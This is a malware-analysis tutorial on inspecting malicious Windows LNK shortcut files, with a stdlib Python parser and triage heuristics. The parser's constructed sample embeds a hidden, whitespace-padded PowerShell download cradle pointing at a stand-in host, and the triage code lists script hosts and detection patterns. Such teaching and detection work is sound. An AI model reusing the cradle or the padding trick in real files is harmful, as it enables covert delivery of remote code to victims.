Analysis of a Malicious LNK File


Attackers do not always need a script packed with several malicious payloads to compromise a victim's system. Sometimes they carry out the attack through a Windows shortcut file, known as an LNK file. In the shortcut's Properties dialog an LNK file exposes a target type, a target location, a target, a "Start in" directory and a comment (underneath, the file follows the binary Shell Link format, MS-SHLLINK). What malware analysts care about most is the target, because the target holds the full command line (program path plus arguments) that the attacker wants executed. Attackers and malware developers commonly use LNK files for purposes including:

1. Downloading a later stage of the malware.
2. Running a malicious script hosted in cloud storage.
3. Running a malicious script directly, through a built-in host such as PowerShell, cmd.exe, mshta or wscript.

Analyzing a malicious LNK file is not difficult; it is actually one of the easiest file types to analyze. You can do it without any external tools, or with the LnkParse3 tool, a Python script that is among the easiest to use. This article covers both methods so that analysts always have a second option when examining a suspicious LNK file.

Analysis Process:

1- The first method (without external tools): this is one of the easiest ways to analyze a malicious LNK file. Copy the suspicious file into your isolated lab VM, right-click it, choose Properties, then read the Target field and copy its contents, as you can clearly see in the picture below. Two caveats: never double-click the file, and remember that Explorer already parses the shortcut just to draw its icon, so the VM must be isolated either way; and the Target box only shows the first part of a long command line (about 260 characters), which attackers exploit by padding the arguments with whitespace so the real command sits out of view. If the Target field looks empty or ends in blank space, fall back to a parser.

2- The second method is the LnkParse3 tool. It is a Python script that parses the Shell Link binary format and extracts the information stored in a malicious (or any other) LNK file, in particular the target, on which the whole analysis depends.

How to install this script:

1. Open a command prompt (CMD).
2. Type: pip install LnkParse3
3. Wait until the installation completes.
4. Run lnkparse followed by the path of the file (for example lnkparse suspicious.lnk) and the program will print the parsed fields.

How to use this script: it accepts the following arguments:

-h, --help            show this help message and exit
-t, --target          print target only
-j, --json            print output in JSON
-c CP, --codepage CP  set codepage of ASCII strings
-a, --all             print all extracted data (i.e. offsets and sizes)

For the analysis process we work with two of them: --target (the target only) and --all (everything extracted, including offsets and sizes).
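Both methods above leave something out: the Properties dialog truncates the Target field, and LnkParse3 must be installed on the analysis box. The following script is an added example written for this article, not code from the post or from the LnkParse3 project. It is a standard-library Python parser for the parts of the Shell Link format that carry the fields an analyst needs (ShellLinkHeader, LinkInfo and StringData: target path, arguments, working directory, icon, window state), followed by a few triage heuristics, run against a constructed sample that the script builds itself rather than any real campaign artifact. The host name example.invalid, the padding of 120 spaces, the list of script hosts and the thresholds in triage() (16 leading spaces, 260 characters) are all assumptions made for the example.

```python
# Stdlib-only MS-SHLLINK (.lnk) parser + triage for the fields that matter in malware analysis.
import re
import struct
from dataclasses import dataclass

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",   # assumed list
                "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec", "curl")


@dataclass
class LnkSummary:
    show_command: int = 1
    local_base_path: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""
    name: str = ""

    def command_line(self) -> str:   # the field the Properties dialog labels 'Target', untruncated
        return f"{self.local_base_path or self.relative_path} {self.arguments}".strip()


def _u16(b, o): return struct.unpack_from("<H", b, o)[0]
def _u32(b, o): return struct.unpack_from("<I", b, o)[0]
def _cstr(b, o): return b[o:b.index(b"\x00", o)].decode("cp1252", "replace")


def parse_lnk(data: bytes) -> LnkSummary:
    if len(data) < HEADER_SIZE or _u32(data, 0) != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file (bad HeaderSize or CLSID)")
    flags = _u32(data, 20)
    s = LnkSummary(show_command=_u32(data, 60))
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:                      # skip the IDList; LinkInfo carries the path
        pos += 2 + _u16(data, pos)
    if flags & HAS_LINK_INFO:
        li, li_size, li_flags = pos, _u32(data, pos), _u32(data, pos + 8)
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath
            s.local_base_path = (_cstr(data, li + _u32(data, li + 16))
                                 + _cstr(data, li + _u32(data, li + 24)))
        pos = li + li_size

    def read_string() -> str:                    # StringData: CountCharacters + chars, no NUL
        nonlocal pos
        n, pos = _u16(data, pos), pos + 2
        width = 2 if flags & IS_UNICODE else 1
        raw, pos = data[pos:pos + width * n], pos + width * n
        return raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")

    for flag, attr in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            setattr(s, attr, read_string())
    return s


def triage(s: LnkSummary) -> list:
    """Reviewer heuristics over the parsed fields (thresholds are assumptions); returns findings."""
    target, args, out = (s.local_base_path or s.relative_path).lower(), s.arguments, []
    hosted = any(h in target for h in SCRIPT_HOSTS)
    if hosted:
        out.append(f"target is a script host / LOLBin: {target}")
    if len(args) - len(args.lstrip()) >= 16:
        out.append("arguments padded with leading whitespace (pushes the payload out of the Properties view)")
    if len(s.command_line()) > 260:
        out.append("command line exceeds 260 chars; the Properties 'Target' box truncates it")
    if re.search(r"https?://|\\\\[\w.-]+\\", args, re.I):
        out.append("remote location in arguments (download / remote script)")
    if re.search(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", args, re.I):
        out.append("encoded PowerShell command in arguments")
    if s.show_command == 7 or re.search(r"-w(indowstyle)?\s+hidden", args, re.I):
        out.append("runs without a visible window (SW_SHOWMINNOACTIVE or -w hidden)")
    if hosted and s.icon_location and not any(h in s.icon_location.lower() for h in SCRIPT_HOSTS):
        out.append(f"decoy icon {s.icon_location!r} on a script-host target")
    return out


def build_sample_lnk() -> bytes:
    """Constructed sample, not a captured artifact: a download cradle hidden behind 120 spaces."""
    target = b"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    args = " " * 120 + ("-w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                        ".DownloadString('http://example.invalid/stage2.ps1')\"")
    flags = (HAS_ID_LIST | HAS_LINK_INFO | HAS_RELATIVE_PATH | HAS_WORKING_DIR
             | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 7, 0, 0, 0, 0)          # ShowCommand 7 = minimised
    id_list = b"\x04\x00\xaa\xbb\x00\x00"                       # one dummy ItemID + TerminalID
    vol = struct.pack("<IIII", 17, 3, 0x1234ABCD, 16) + b"\x00"  # VolumeID: DRIVE_FIXED, no label
    lbp, suffix, hdr = target + b"\x00", b"\x00", 28
    link_info = struct.pack("<IIIIIII", hdr + len(vol) + len(lbp) + 1, hdr, 0x1, hdr,
                            hdr + len(vol), 0, hdr + len(vol) + len(lbp)) + vol + lbp + suffix
    ustr = lambda t: struct.pack("<H", len(t)) + t.encode("utf-16-le")
    strings = (ustr("..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")
               + ustr("C:\\Windows\\System32") + ustr(args) + ustr("%SystemRoot%\\System32\\shell32.dll"))
    return header + struct.pack("<H", len(id_list)) + id_list + link_info + strings + struct.pack("<I", 0)


if __name__ == "__main__":
    summary = parse_lnk(build_sample_lnk())
    print("Target:", summary.command_line(), *triage(summary), sep="\n")
```

Run the script as-is to see the untruncated Target line and the findings for the constructed sample; on a real case replace build_sample_lnk() with the bytes of the file read from disk. The parser reads the same fields that the Properties dialog and lnkparse --target display; its point is to show where those fields live in the binary and to surface the whitespace-padding trick that the dialog hides.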

The following figures show the output of the two options used in the analysis process:

--target option:



--all option:




